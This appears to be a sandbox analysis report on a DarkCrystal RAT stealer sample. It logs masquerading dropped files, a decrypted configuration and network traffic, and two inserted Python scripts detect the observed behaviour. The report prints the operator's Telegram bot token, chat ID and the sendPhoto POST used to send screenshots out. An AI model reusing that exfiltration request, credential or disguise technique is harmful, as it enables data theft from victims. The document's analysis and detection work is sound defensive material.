                                Source: C:\Users\user\Desktop\tnEMlbYs.logVirustotal: Detection: 7%Perma Link
                                Source: H9gMIu2HXi.exeVirustotal: Detection: 60%Perma Link
                                Source: H9gMIu2HXi.exeReversingLabs: Detection: 42%
                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeJoe Sandbox ML: detected
                                Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\tRVOBpwv.logJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\tnEMlbYs.logJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\aEtIhTbg.logJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeJoe Sandbox ML: detected
                                Source: C:\Recovery\winlogon.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\TDfrhvdw.logJoe Sandbox ML: detected
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpackString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"TelegramNotifer":{"chatid":"6770966847","bottoken":"7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o","settings":" !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"False","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"}}
                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpackString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-wSLzwx2vNs3ciNJLvHL2","0","xworm","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                Source: H9gMIu2HXi.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Directory created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Directory created: C:\Program Files\Windows Multimedia Platform\8de7bf56f754b7
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Directory created: C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Directory created: C:\Program Files\Microsoft Office 15\8de7bf56f754b7
                                Source: unknown | HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49730 version: TLS 1.2
                                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
                                Source: H9gMIu2HXi.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: H9gMIu2HXi.exe, work.exe.0.dr, dwartg.exe.3.dr
                                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.pdb source: SurrogatewebSession.exe, 00000008.00000002.1734602264.00000000036B9000.00000004.00000800.00020000.00000000.sdmp

                                Spreading

                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A2BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A3D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_0031BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_0032D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_0072A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_0073C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File opened: C:\Users\user
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File opened: C:\Users\user\Documents\desktop.ini
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File opened: C:\Users\user\AppData
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File opened: C:\Users\user\AppData\Local\Temp
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File opened: C:\Users\user\Desktop\desktop.ini
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File opened: C:\Users\user\AppData\Local
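Two of the observations in this report are exactly what the Sigma rules listed in the overview key on: csc.exe writing an executable into C:\Windows\System32, and a binary named winlogon.exe living in C:\Recovery instead of System32. The following Python is an added example, not part of the report or of any Sigma rule, that classifies file-write events on both counts. The expected home directories and the compiler list are this example's own assumptions; the events are constructed from the paths shown above (this section shows C:\Recovery\winlogon.exe as a dropped file but not which process wrote it, so that writer is assumed), and the third event is a benign control.

```python
"""Flag system-named binaries outside their home directory and compiler-written executables."""
import ntpath

# Assumption: where the genuine copies of these binaries live on a default install.
EXPECTED_DIRS = {
    "winlogon.exe": {r"c:\windows\system32"},
    "securityhealthsystray.exe": {r"c:\windows\system32"},
}
# Assumption: compilers that legitimately run but should never emit executables into system paths.
COMPILERS = {"csc.exe", "vbc.exe", "msbuild.exe"}
SYSTEM_ROOTS = (r"c:\windows\system32", r"c:\windows\syswow64")

# (writing process, written path) events constructed from the report's observations.
SAMPLE_EVENTS = [
    (r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     r"C:\Windows\System32\SecurityHealthSystray.exe"),
    # Writer assumed: the report shows the dropped file, not the dropping process.
    (r"C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe",
     r"C:\Recovery\winlogon.exe"),
    # Benign control (constructed): the real winlogon.exe being serviced in place.
    (r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\winlogon.exe"),
]


def classify(writer: str, target: str) -> list:
    """Return the detection reasons that apply to one file-write event."""
    reasons = []
    wname = ntpath.basename(writer).lower()
    tname = ntpath.basename(target).lower()
    tdir = ntpath.normpath(ntpath.dirname(target)).lower()
    if tname in EXPECTED_DIRS and tdir not in EXPECTED_DIRS[tname]:
        reasons.append("system-binary-name-in-unexpected-location")
    if wname in COMPILERS and tname.endswith(".exe"):
        reasons.append("compiler-wrote-executable")
    if wname in COMPILERS and tdir.startswith(SYSTEM_ROOTS):
        reasons.append("compiler-wrote-into-system-directory")
    return reasons


def scan(events) -> dict:
    """Map each flagged target path to its reasons; clean events are omitted."""
    findings = {}
    for writer, target in events:
        reasons = classify(writer, target)
        if reasons:
            findings[target] = reasons
    return findings


if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_EVENTS).items():
        print(path, "->", ", ".join(reasons))
```

Note that the System32 write in the first event is not caught by the location check, since that is where SecurityHealthSystray.exe belongs; it is the writer (a compiler) that makes it suspicious, which is why the two checks are kept separate.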

                                Networking

                                Source: Traffic | Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49739 -> 104.21.79.128:80
                                Source: unknown | DNS query: name: api.telegram.org
                                Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1\r\nHost: ipinfo.io\r\nConnection: Keep-Alive
                                Source: global traffic | HTTP traffic detected: GET /country HTTP/1.1\r\nHost: ipinfo.io
                                Source: global traffic | HTTP traffic detected: POST /bot7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o/sendPhoto HTTP/1.1\r\nContent-Type: multipart/form-data; boundary="4e636f77-7e21-4561-94a7-274b0110f910"\r\nHost: api.telegram.org\r\nContent-Length: 98588\r\nExpect: 100-continue\r\nConnection: Keep-Alive
                                Source: Joe Sandbox View | IP Address: 34.117.186.192
                                Source: Joe Sandbox View | IP Address: 149.154.167.220
                                Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: unknown | DNS query: name: ipinfo.io
                                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknown | DNS traffic detected: queries for: ipinfo.io
                                Source: unknown | HTTP traffic detected: POST /bot7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o/sendPhoto HTTP/1.1\r\nContent-Type: multipart/form-data; boundary="4e636f77-7e21-4561-94a7-274b0110f910"\r\nHost: api.telegram.org\r\nContent-Length: 98588\r\nExpect: 100-continue\r\nConnection: Keep-Alive
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.00000000033D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000379A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ipinfo.io
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.00000000029C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003397000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003397000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734323133.0000000002E02000.00000002.00000001.01000000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002729000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002613000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002740000.00000004.00000800.00020000.00000000.sdmp, rGzNBWQu.log.43.dr, lKwWBiIK.log.8.dr | String found in binary or memory: https://api.telegram.org/bot
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003397000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o/sendPhotoX
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003349000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000377C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734323133.0000000002E02000.00000002.00000001.01000000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000377C000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002729000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002613000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002740000.00000004.00000800.00020000.00000000.sdmp, rGzNBWQu.log.43.dr, lKwWBiIK.log.8.dr | String found in binary or memory: https://ipinfo.io/country
                                Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734323133.0000000002E02000.00000002.00000001.01000000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000377C000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002729000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002613000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002740000.00000004.00000800.00020000.00000000.sdmp, rGzNBWQu.log.43.dr, lKwWBiIK.log.8.dr | String found in binary or memory: https://ipinfo.io/ip
                                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
                                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
                                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
                                Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
                                Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
                                Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
                                Source: unknown | HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49730 version: TLS 1.2
                                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
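The request sequence above (two GET requests to ipinfo.io for the public IP and country, then a multipart POST to api.telegram.org/bot<token>/sendPhoto) is the check-in that the Snort rule fires on. The following Python is an added example, not part of the report, that runs that logic over HTTP request records: it flags any Telegram Bot API call, treats an upload method with a body as exfiltration, flags the geolocation lookup, and redacts the secret half of the token before a finding is logged. The request records are constructed from the three requests observed above plus one benign control; the record field names and the token regex are this example's own assumptions.

```python
"""Flag the Telegram-bot exfiltration and ipinfo.io geolocation pattern in HTTP request records."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumption: Bot API paths look like /bot<8-10 digit id>:<35-char secret>/<method>.
BOT_TOKEN_RE = re.compile(r"/bot(\d{8,10}):([A-Za-z0-9_-]{35})/(\w+)")
UPLOAD_METHODS = {"sendPhoto", "sendDocument", "sendVideo", "sendAudio"}
GEO_HOSTS = {"ipinfo.io"}

# Request records constructed from the requests observed in the report, plus one
# benign control. Field names are this example's own, not a pcap format.
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/ip", "host": "ipinfo.io", "length": 0},
    {"method": "GET", "path": "/country", "host": "ipinfo.io", "length": 0},
    {"method": "POST",
     "path": "/bot7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o/sendPhoto",
     "host": "api.telegram.org", "length": 98588},
    {"method": "GET", "path": "/index.html", "host": "example.com", "length": 0},
]


@dataclass
class Finding:
    host: str
    path: str           # already redacted, safe to log
    reason: str
    bot_id: Optional[str] = None
    api_method: Optional[str] = None


def redact_token(path: str) -> str:
    """Keep the numeric bot id (useful for pivoting) but drop the secret half."""
    return BOT_TOKEN_RE.sub(lambda m: f"/bot{m.group(1)}:<redacted>/{m.group(3)}", path)


def inspect_request(req: dict) -> List[Finding]:
    """Return zero or more findings for a single request record."""
    findings = []
    host = req["host"].lower()
    safe_path = redact_token(req["path"])
    m = BOT_TOKEN_RE.search(req["path"])
    if host == "api.telegram.org" and m:
        bot_id, api_method = m.group(1), m.group(3)
        findings.append(Finding(host, safe_path, "telegram-bot-api-call", bot_id, api_method))
        # A body on an upload method is the stealer pushing a screenshot or log out.
        if api_method in UPLOAD_METHODS and req["method"] == "POST" and req["length"] > 0:
            findings.append(Finding(host, safe_path, "telegram-upload-exfil", bot_id, api_method))
    if host in GEO_HOSTS:
        findings.append(Finding(host, safe_path, "ip-geolocation-lookup"))
    return findings


def scan(requests) -> List[Finding]:
    return [f for r in requests for f in inspect_request(r)]


def is_checkin_sequence(requests) -> bool:
    """True when a geolocation lookup is followed by a Telegram upload, as in this sample."""
    reasons = [f.reason for f in scan(requests)]
    if "ip-geolocation-lookup" not in reasons or "telegram-upload-exfil" not in reasons:
        return False
    return reasons.index("ip-geolocation-lookup") < reasons.index("telegram-upload-exfil")


if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f)
    print("check-in sequence:", is_checkin_sequence(SAMPLE_REQUESTS))
```

The redaction matters in practice: the token is a live credential for the operator's bot, and copying it verbatim into tickets or SIEM dashboards spreads it further than it needs to go.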

                                System Summary

                                Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class16.cs | Long String: Length: 157876
                                Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Class16.cs | Long String: Length: 157876
                                Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A27AAF: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A292C6
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A35011
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A462A8
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A35282
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A302F7
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A38253
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A313FD
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A464D7
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A3742E
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A355B0
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A4E600
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A307A7
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A388AF
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A2D833
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A2395A
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A4EAAE
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A24A8E
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A52BB4
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A2FCCC
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A37DDC
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A22EB6
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_003192C6
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_00325011
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_00328253
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_003362A8
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_00325282
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_003202F7
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_003213FD
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_0032742E
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_003364D7
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_003255B0
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_0033E600
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_003207A7
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_0031D833
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_003288AF
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_0031395A
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_0033EAAE
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_00314A8E
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_00342BB4
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_0031FCCC
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_00332D40
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_00327DDC
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_00312EB6
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_0072848E
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_007240FE
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_007300B7
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_00734088
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_00737153
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_007451C9
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_007232F7
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_007362CA
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_007343BF
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_0072F461
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_0074D440
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_0072C426
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_007377EF
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_0072286B
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_0074D8EE
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_007519F4
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_0072E9B7
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_00736CDC
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_00733E0B
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_0072EFE2
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_00744F9A
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 8_2_00007FFD9BAB8028
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 8_2_00007FFD9BABC425
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 8_2_00007FFD9BABC350
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 8_2_00007FFD9BAB8E70
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 8_2_00007FFD9BAB1222
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 8_2_00007FFD9BAB8E7F
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 8_2_00007FFD9BAC48EE
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 8_2_00007FFD9BC2E842
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 8_2_00007FFD9BC2DA96
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 8_2_00007FFD9BC3111B
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe | Code function: 14_2_00007FFD9BA91222
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe | Code function: 15_2_00007FFD9BAC1222
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 32_2_00007FFD9BAB1222
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 33_2_00007FFD9BAB1222
                                Source: C:\Recovery\winlogon.exe | Code function: 34_2_00007FFD9BAB1222
                                Source: C:\Recovery\winlogon.exe | Code function: 35_2_00007FFD9BAB1222
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 40_2_00007FFD9BAB1222
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe | Code function: 42_2_00007FFD9BAD1222
                                Source: C:\Recovery\winlogon.exe | Code function: 43_2_00007FFD9BAC8028
                                Source: C:\Recovery\winlogon.exe | Code function: 43_2_00007FFD9BACC425
                                Source: C:\Recovery\winlogon.exe | Code function: 43_2_00007FFD9BACC350
                                Source: C:\Recovery\winlogon.exe | Code function: 43_2_00007FFD9BAC8E70
                                Source: C:\Recovery\winlogon.exe | Code function: 43_2_00007FFD9BAC1222
                                Source: C:\Recovery\winlogon.exe | Code function: 43_2_00007FFD9BAC8E7F
                                Source: C:\Recovery\winlogon.exe | Code function: 43_2_00007FFD9BAD48EE
                                Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\BudDliLc.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: String function: 0032FFD0 appears 56 times
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: String function: 0032FEFC appears 42 times
